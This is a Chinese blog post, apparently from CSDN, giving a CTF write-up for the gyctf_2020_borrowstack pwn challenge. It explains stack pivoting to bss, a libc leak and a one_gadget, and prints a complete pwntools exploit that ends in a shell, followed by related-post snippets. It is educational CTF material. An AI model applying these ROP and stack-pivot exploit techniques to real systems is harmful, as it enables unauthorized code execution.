gyctf_2020_borrowstack 1

于 2024-03-27 20:56:58 发布
阅读量321 收藏 2
点赞数 3
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74861133/article/details/137088965
版权

1.checksec

2.ida

在这里插入图片描述
在read buf处存在栈溢出漏洞,但只能溢出8字节,而后面有向bss段bank处读入数据,我们就可以通过栈迁移,借用bank处的bss段构建栈,但因为该bss段距离.got.plt段非常近,所以要通过在bank处构建的payload时先填充20个ret指令的地址从而实现抬高栈,这样就不会覆盖到got表处了,抬高20个可能是因为后面又要回到main函数,而main函数中要执行sub esp 60h这样如果没有抬栈就会由于主函数中的操作将got段覆盖掉。
该题还有一个就是用了一个工具one_gadget
在这里插入图片描述
看了一下第二个条件就可以满足,偏移是0x4526a,只要通过泄露libc计算出基址就可以通过该偏移得到该shell的地址。

3.exp

from pwn import*
context(os='linux',arch='amd64')
p=remote('node5.buuoj.cn',25719)
#p=process('./29')
elf=ELF('./29')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main=elf.sym['main']
lea_ret=0x400699
rdi_ret=0x400703
ret=0x4004c9
bss=0x601080
payload=b'a'*0x60+p64(bss)+p64(lea_ret)
p.send(payload)

payload=p64(ret)*20+p64(rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main)
p.sendline(payload)
p.recvuntil('now!\n')
puts_ad=u64(p.recv(6).ljust(8,b'\x00'))
print(hex(puts_ad))

libc=ELF('./ubantu1664.so')
libcbase=puts_ad-libc.sym['puts']
one_gadget=libcbase+0x4526a
payload=b'a'*0x68+p64(one_gadget)
p.send(payload)


p.interactive()
曾经满眼皆是她
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
BUUCTF gyctf_2020_borrowstack
BengDouLove的博客
04-22 792
第一个read的只能溢出0x10字节,也就是刚好覆盖返回地址,如果要ROP地方肯定不够 所以栈迁移到bank,在那里ROP 之前没遇到过这样的题,怎么迁过去我苦思冥想,最终还是看了wp,,用两个leave来控制rsp和rbp寄存器,太妙了 leave是个伪代码,,分解开就是 mov rsp,rbp pop rbp 如果把栈构造成这样 ‘A’ * 0x60 bank_addr leave_...
GYCTF 2020-borrowstack
Eagle_hwei的博客
03-12 1016
borrowstack的题目分析 2020-03-1210:46:10 by hawkJW 题目附件、ida文件及wp链接   这道题的漏洞很明显,思路也比较明显,但就是有坑!!!学习一下 1. 程序流程总览 首先,按照惯例,我们看一下程序开启的保护措施,如图所示 除了栈上不可以执行以外,其余的保护措施基本没有开启,因此该程序的保护措施还是比较松的。 下面我们来粗略的浏览一下...
gyctf_2020_borrowstack
z1r0的博客
12-23 1295
gyctf_2020_borrowstack 查看保护 栈迁移,将payload写入bank,借助buf这个溢出来执行两次leave_ret从而控制ebp esp 和 eip到payload这里。具体的栈迁移知识这里就不细说了。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.bu
GYCTF2020borrowstack------<栈迁移原理、ret2csu万能gadget、one-gadget工具>
qq_21746331的博客
01-22 1144
GYCTF2020borrowstack知识点关键字样本知识点详解0x1 ret2csu原理0x2 栈迁移原理0x3 one-gadget 工具样本分析0x1 静态分析0x2 payload 构造0x3 动态调试0x4 exp参考文献 知识点关键字 栈迁移、ROP、csu万能gadget、one-gadget 样本 样本来自于GYTF2020_borrowstack,BUUCTF上有练习环境 知识点详解 0x1 ret2csu原理 动机: 在 64 位程序中,函数的前 6 个参数是通过寄存器传递
PHP登录环节防止sql注入的方法浅析
10-25
主要介绍了PHP登录环节防止sql注入的方法,需要的朋友可以参考下
[BUUCTF]PWN——gyctf_2020_borrowstack
mcmuyanga的博客
11-17 1437
gyctf_2020_borrowstack 附件 步骤: 例行检查,64位程序,开启NX保护 本地运行一下程序,看看大概的情况 64位ida载入,直接从main函数开始看程序, buf可以溢出0x10字节,只能够覆盖到ret,参数bank在bss段上,所以打算在buf处利用leave指令去劫持栈,让它跳转去bank处,往bank里写入我们的ret2libc的攻击链去获取shell 随便找个leave指令的地址,leave=0x400699 bank在bss段上的地址 设置rdi寄存器的指令地
BUUCTF--gyctf_2020_borrowstack1
最新发布
qq_30528603的博客
01-05 351
迁到什么地方呢,肯定就是这个bank所在的地方了。我们还需要考虑一些细节上的东西,首先我们需要知道libc的基地址,因此我们需要通过puts函数来泄露。后续的操作就很简单,通过泄露的puts函数地址,计算出libc的基地址,当程序再次回到主函数时,直接将栈上的返回地址覆盖成one_gadget拿到权限。接下来的操作基本都是pop,因此rsp是从低地址到高地址跑(每次pop,rsp+8),所以我们顺序布局就可以。old_rbp覆盖成我们的bss段,让rbp指过去,接着返回地址需要再调用一次leave。
pwngyctf_2020_borrowstack
Nothing
03-02 1613
例行检查 程序逻辑 看到buf缓冲区有0x10大小溢出,且可以控制bss段上的bank,可以用栈迁移做,这题的bss段离got表较近,在迁移时尽量往高地址迁移,防止在rop时破坏got表上数据。 from pwn import * io=remote('node3.buuoj.cn','29302') bank=0x0601080 leave=0x400699 puts_plt=0x0400...
关于“gyctf_2020_borrowstack”,涉及栈迁移(pivoting),通用gadge,one_gadget
Probeginner的博客
12-05 282
我们首先给出wp: from pwn import* context.log_level='debug' p=remote('node4.buuoj.cn',26985) elf=ELF('./barop') p_rdi=0x400993 puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] read_got=elf.got['read'] lbic=ELF('./libc-2.23.so') p.recvuntil("u!") ```python p.sen
BUUCTF-PWN刷题记录-2
weixin_44145820的博客
03-15 612
目录gyctf_2020_borrowstack gyctf_2020_borrowstack 本题只有有限的溢出空间,而且有NX的保护,只能用ROP的办法 利用方法为把rbp改为bank+4的地址,返回地址改为leave的地址,这样就能利用RBP修改RSP,bank前8个字节填写bank+8的地址,之后跟上ROP链, 不过这题还有一点,就是Bank离stdin和stdout比较近,需要先使用...
栈帧劫持的一些利用方法及注意事项--buuctf--gyctf_2020_borrowstack
PLpa的博客
07-01 553
前言 最近在刷buuctf时发现了很多栈帧劫持的题目,从中取出最有代表性的、坑最多的拿出来写一篇博客记录一下。 保护机制 64位Linux程序,只开了NX保护。 解题思路 IDA看伪代码 伪代码分析 从代码中我们可以看到,read读入buf的字节大小只多了0x10,这样是不能构成ROP链的,但是我们发现,程序下面给了我们一个bank的bss段的地址,这不就是典型的劫持栈帧到bss段吗? 但是这里有一个坑: 我们可以看到got.plt距离bss段非常近,而bank又正好是在0x601080的位置,当我们
[BUUCTF-pwn]——gyctf_2020_borrowstack
Y_peak的博客
03-18 301
[BUUCTF-pwn]——gyctf_2020_borrowstack exploit from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',28602) #p = process('./gyctf_2020_borrowstack') elf = ELF('./gyctf_2020_borrowstack') #libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so') #g
buuctf [V&N2020 公开赛]warmup
qq_42728977的博客
04-14 453
禁了exceve,只能用open》read》puts了 参考链接 https://www.cnblogs.com/luoleqi/p/12468271.html http://www.starssgo.top/2020/03/04/%C2%96%C2%96%C2%96%C2%96-V-N2020-%E5%85%AC%E5%BC%80%E8%B5%9B-pwn/#warmup ...
BUUCTF【gyctf_2020_force】(house of force)
weixin_51055545的博客
01-29 631
一道题学习 House of force 首先说明一下House of force的利用条件: 1.能够通过堆溢出等方法控制到topchunk的size 2.分配的大小没有限制,即可以申请任意大小的堆块 3.能够泄露出堆地址(topchunk) House of force 产生的原因: 在于 glibc 对 top chunk 的处理,进行堆分配时,如果所有空闲的块都无法满足需求,那么就会从 top chunk 中分割出相应的大小作为堆块的空间。若 top chunk 的 size 值是由用户控制的任意的

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值